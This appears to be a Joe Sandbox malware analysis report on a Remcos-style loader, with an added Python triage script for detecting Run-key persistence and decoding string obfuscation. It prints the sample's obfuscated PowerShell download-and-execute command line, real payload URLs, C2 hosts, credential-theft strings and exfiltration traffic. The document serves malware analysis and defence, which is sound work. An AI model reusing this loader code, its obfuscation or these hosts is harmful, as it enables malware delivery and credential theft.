              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgar
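Two things in the entries above are worth being able to reproduce on the bench. First, the persistence value: the Run entry "Argumentlistens" is REG_EXPAND_SZ, starts with %Semicomic% instead of naming an interpreter, and its real script body is read back at logon from the registry value HKCU:\Agenetic76\Tautologiske178. Second, the string obfuscation: the Sortkridtstegningens function in the PowerShell command line (Beshout in the process tree is the same construction) loops For($i=5; $i -lt $Length-1; $i+=6) and appends Substring($i,1), so every literal is five junk characters before each real character, with a trailing character that is never read. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample. The Sysmon-style records, the benign control record and the obfuscated literals are constructed here to mirror the report's data; the literals printed on this page cannot be fed in verbatim because the HTML rendering has collapsed runs of spaces inside them, so decode from the raw command line or from memory instead.

```python
"""Triage helpers for the persistence and string obfuscation seen in this report.

Added example, not part of the Joe Sandbox report. The Sysmon-style records and
the obfuscated literals below are constructed to mirror the page's data.
"""
import itertools
import re
from typing import Dict, List, Optional, Tuple

# --- Part 1: Run-key persistence whose script body is staged in the registry --

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\[^\\]+$", re.IGNORECASE)
# Value data that starts with %Var%: the launcher (here powershell.exe) is hidden
# behind an environment variable, so the Run value itself names no binary.
ENV_LAUNCHER_RE = re.compile(r"^\s*%[^%\s]+%")
# (Get-ItemProperty -Path 'HKCU:\Key\').ValueName : script text read from the registry.
REG_STAGED_RE = re.compile(
    r"Get-ItemProperty\s+-Path\s+'(HK(?:CU|LM):[^']*)'\s*\)\s*\.\s*(\w+)", re.IGNORECASE)
HIDDEN_WINDOW_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)


def staged_script_location(details: str) -> Optional[Tuple[str, str]]:
    """(registry key, value name) holding the real script if the Run value data
    reads it back with Get-ItemProperty, else None."""
    m = REG_STAGED_RE.search(details)
    return (m.group(1), m.group(2)) if m else None


def flag_run_value(event: Dict[str, str]) -> List[str]:
    """Reasons a Sysmon EventID 13 (SetValue) record resembles this loader's
    persistence. Empty list: not a Run-key write, or none of the indicators."""
    if event.get("EventID") != "13" or event.get("EventType") != "SetValue":
        return []
    if not RUN_KEY_RE.search(event.get("TargetObject", "")):
        return []
    details = event.get("Details", "")
    reasons: List[str] = []
    if ENV_LAUNCHER_RE.match(details):
        reasons.append("launcher hidden behind %ENVVAR% expansion (REG_EXPAND_SZ)")
    loc = staged_script_location(details)
    if loc:
        reasons.append(f"script body staged in registry: {loc[0]} value {loc[1]}")
    if HIDDEN_WINDOW_RE.search(details):
        reasons.append("interpreter started with a hidden window")
    return reasons


# --- Part 2: the Sortkridtstegningens()/Beshout() string padding ---------------

def decode_stride(blob: str, start: int = 5, stride: int = 6) -> str:
    """Recover one obfuscated literal. Mirrors the PowerShell loop
    For($i=5; $i -lt $Length-1; $i+=6) { $out += $s.Substring($i,1) }:
    one payload character after every five junk characters; the final
    character is never read."""
    return blob[start:len(blob) - 1:stride]


def decode_literals(script: str, decoder_name: str) -> List[str]:
    """Decode every single-quoted literal passed to the decoder function."""
    pat = re.compile(re.escape(decoder_name) + r"\s+'([^']*)'")
    return [decode_stride(lit) for lit in pat.findall(script)]


def encode_stride(plain: str, stride: int = 6) -> str:
    """Inverse of decode_stride, used here only to build constructed fixtures:
    stride-1 filler characters before each payload character, plus one
    trailing character that the decoder skips."""
    filler = itertools.cycle(["Molyi", "Forhe", "Topsa", "Kphje"])  # 5 chars each
    return "".join(next(filler)[: stride - 1] + ch for ch in plain) + " "


# Constructed record mirroring the 'Registry Key set' Sigma entry on this page.
SAMPLE_EVENT: Dict[str, str] = {
    "EventID": "13",
    "EventType": "SetValue",
    "Image": r"C:\Windows\SysWOW64\reg.exe",
    "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Argumentlistens",
    "Details": r"%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)",
}
# Constructed benign control: an ordinary Run value pointing straight at a binary.
BENIGN_EVENT: Dict[str, str] = {
    "EventID": "13",
    "EventType": "SetValue",
    "Image": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe",
    "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
    "Details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}
# Constructed script fragment in the shape of the real command line.
SAMPLE_SCRIPT = (
    f"$festdragtens=Sortkridtstegningens '{encode_stride('Mozilla/5.0')}';"
    f"$Fligene=Sortkridtstegningens '{encode_stride('iex')}';"
)

if __name__ == "__main__":
    for reason in flag_run_value(SAMPLE_EVENT):
        print("suspicious:", reason)
    print("benign control:", flag_run_value(BENIGN_EVENT))
    print(decode_literals(SAMPLE_SCRIPT, "Sortkridtstegningens"))
```

Run as a script it prints three reasons for the constructed record, an empty list for the control, and the two decoded literals. On a real host feed it Sysmon Event ID 13 records, and note that the Run value is inert on its own: %Semicomic% has to expand to a PowerShell launcher at logon, so a persistent definition of that variable (HKCU\Environment is the usual place; the report does not show where the sample sets it) and the contents of HKCU:\Agenetic76 are the next two things to pull.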
Timestamp: 05/31/24-08:09:37.861418 | SID: 2032776 | Source Port: 51547 | Destination Port: 3050 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 05/31/24-08:09:38.586077 | SID: 2032777 | Source Port: 3050 | Destination Port: 51547 | Protocol: TCP | Classtype: A Network Trojan was detected


              AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware (pesterbdd.com is the site of the Pester PowerShell testing framework; this URL is carried in the Pester module manifest that ships with Windows PowerShell and turns up in the memory of most PowerShell-based samples, so treat this hit as a likely false positive rather than as an indicator of this sample)
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing (geoplugin.net is a public geolocation API; the request itself, GET /json.gp with no User-Agent, is the characteristic Remcos start-up lookup and is the useful indicator here)
Source: http://194.59.30.6/UWYVFXQWh32.bin | Avira URL Cloud: Label: malware
Source: http://194.59.30.6/Uncomic.mdp | Avira URL Cloud: Label: malware
Source: jgbours284hawara02.duckdns.org | Virustotal: Detection: 5%
Source: http://194.59.30.6/Uncomic.mdp | Virustotal: Detection: 7%
Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat | Virustotal: Detection: 14%
Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat | ReversingLabs: Detection: 13%
Source: Yara match | File source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,16_2_00404423 (CryptUnprotectData is the DPAPI decryption call; resolving it dynamically from the injected code is consistent with the browser and mail credential theft signatures listed for this sample)
Source: unknown | HTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51553 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51555 version: TLS 1.2
Source: Binary string: lambda_methodCore.pdb5 source: powershell.exe, 00000006.00000002.2507983794.0000000008320000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2966794524.00000000088BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2508311915.000000000837F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT source: powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l@ source: powershell.exe, 00000006.00000002.2505588191.0000000007251000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_21CB10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB6580 FindFirstFileExA,11_2_21CB6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

              Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

              Networking

Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:51547 -> 178.215.236.110:3050
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 178.215.236.110:3050 -> 192.168.2.6:51547
Source: unknown | DNS query: name: jgbours284hawara02.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.6:51547 -> 178.215.236.110:3050
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 137.220.252.40
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: LVLT-10753US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 194.59.30.6 (50 identical entries; the payload host is contacted by raw IP, so no DNS record of it exists)
Source: global traffic | HTTP traffic detected: GET /Rutschebanes.qxd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ramirex.ro | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ramirex.ro | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /Uncomic.mdp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 194.59.30.6 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /UWYVFXQWh32.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 194.59.30.6 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-P HTTP/1.1 | Host: www.387mfyr.sbs | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
              Source: wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2559663310.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2559663310.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000B.00000002.3437548482.00000000225D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000B.00000002.3437548482.00000000225D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: 103.169.127.40.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficDNS traffic detected: DNS query: ramirex.ro
              Source: global trafficDNS traffic detected: DNS query: www.387mfyr.sbs
              Source: global trafficDNS traffic detected: DNS query: www.led-svitidla.eu
              Source: unknownHTTP traffic detected: POST /abt9/ HTTP/1.1Host: www.led-svitidla.euAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.led-svitidla.euReferer: http://www.led-svitidla.eu/abt9/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 210User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 55 52 6c 30 54 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 31 43 37 49 78 67 6a 71 4c 71 35 48 50 4f 69 37 31 77 6c 6c 70 79 4c 74 36 34 35 70 42 4e 48 34 32 30 6b 6c 34 30 52 4e 33 72 50 Data Ascii: URl0T=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+1C7IxgjqLq5HPOi71wllpyLt645pBNH420kl40RN3rP
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 31 May 2024 06:10:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 31 May 2024 06:11:07 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 31 May 2024 06:11:12 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data 